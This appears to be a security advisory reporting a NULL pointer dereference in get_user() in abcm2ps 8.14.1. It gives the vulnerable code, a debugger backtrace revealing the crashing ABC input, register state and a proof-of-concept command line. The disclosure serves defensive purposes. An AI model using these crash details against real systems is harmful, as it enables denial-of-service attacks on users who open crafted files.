Null pointer dereference vulnerability in the function get_user() – abcm2ps-8.14.1
December 17, 2018
CVE Number
–
CWE
CWE-476: NULL Pointer Dereference
Product Details
abcm2ps is a C program which converts music tunes from the ABC music notation to PostScript or SVG.
URL: https://github.com/leesavide/abcm2ps.git
Vulnerable Versions
8.14.1-master
Vulnerability Details
Null Pointer Dereference vulnerability is discovered in the abcm2ps (8.14.1-master). The same can be triggered by sending a crafted abc file to the abcm2ps binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified other impact when a victim opens a specially crafted file.
SYNOPSIS
By observing the functions parse_line() which parse a ABC line and for parse an information field it calls another function parse_info() which calls function get_user() in abcparse.c to get a user defined symbols and then at strcmp(value, "beambreak"), strcmp is accessing the pointer which is already zero,
After deugging we observed that, char * value is assigned by parse.deco_tb[s->u.user.value – 128] which is 0x0 which leads to the Segmentation fault(NULL pointer dereference).
Vulnerable code
value = parse.deco_tb[s->u.user.value - 128]; if (strcmp(value, "beambreak") == 0) char_tb[c] = CHAR_SPAC;
Analysis
In function get_user() in abcparse.c
value = parse.deco_tb[s->u.user.value - 128];
if (strcmp(value, "beambreak") == 0)
char_tb[c] = CHAR_SPAC;
else if (strcmp(value, "ignore") == 0)
char_tb[c] = CHAR_IGN;
else if (strcmp(value, "nil") == 0
|| strcmp(value, "none") == 0)
────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] Id 1, Name: "abcm2ps", stopped, reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] 0x55555555dbdb → get_user(p=0x5555557f4a27 "tenu", s=0x55555580da68)
[#1] 0x55555555fb7b → parse_info(p=0x5555557f4a22 "M = !tenu")
[#2] 0x555555561edd → parse_line(p=0x5555557f4a20 "U:M = !tenu")
[#3] 0x555555561edd → abc_parse(p=0x5555557f4a20 "U:M = !tenu", fname=0x5555557f39f0 "POC", ln=0x3)
[#4] 0x555555579a54 → txt_add_eos(fname=0x5555557f39f0 "POC", linenum=0x3)
[#5] 0x555555579ee4 → frontend(s=, ftype=, fname=, linenum=)
[#6] 0x55555555ce2d → treat_file(fn=0x7fffffffe26a "POC", ext=)
[#7] 0x55555555b9e1 → main(argc=0x17, argv=0x7fffffffde38)
gef➤ p parse.deco_tb
$1 = {0x0 }
gef➤ ptype value
type = char *
gef➤ p value
$2 = 0x0
gef➤ i r
rax 0x0 0x0
rbx 0x5555557f4a27 0x5555557f4a27
rcx 0xa 0xa
rdx 0x5555557c49a0 0x5555557c49a0
rsi 0x0 0x0
rdi 0x5555555a3005 0x5555555a3005
rbp 0x4d 0x4d
rsp 0x7fffffffd850 0x7fffffffd850
r8 0xe 0xe
r9 0x1 0x1
r10 0xc 0xc
r11 0x246 0x246
r12 0x55555580da68 0x55555580da68
r13 0x5555557b5060 0x5555557b5060
r14 0x55555580fb9e 0x55555580fb9e
r15 0x0 0x0
rip 0x55555555dbdb 0x55555555dbdb
eflags 0x10282 [ SF IF RF ]
cs 0x33 0x33
ss 0x2b 0x2b
ds 0x0 0x0
es 0x0 0x0
fs 0x0 0x0
gs 0x0 0x0
Tested environment
64-bit ubuntu 16.04 LTS
Proof of Concept
./abcm2ps r -E -g -x -v -O fff -O = -i -k 1 $POC -s 10 -w 1 -m 100 -d 100 -a 0 -f musicfont.fmt -D Bar/ -p -l -I 500 -x -M -N 3 -1 -G -j 0 -b 1 -f -T all -c -B 10
Timeline
Vendor Disclosure: 2018-12-13
Public Disclosure:
Credit
Discovered by ACE Team – Loginsoft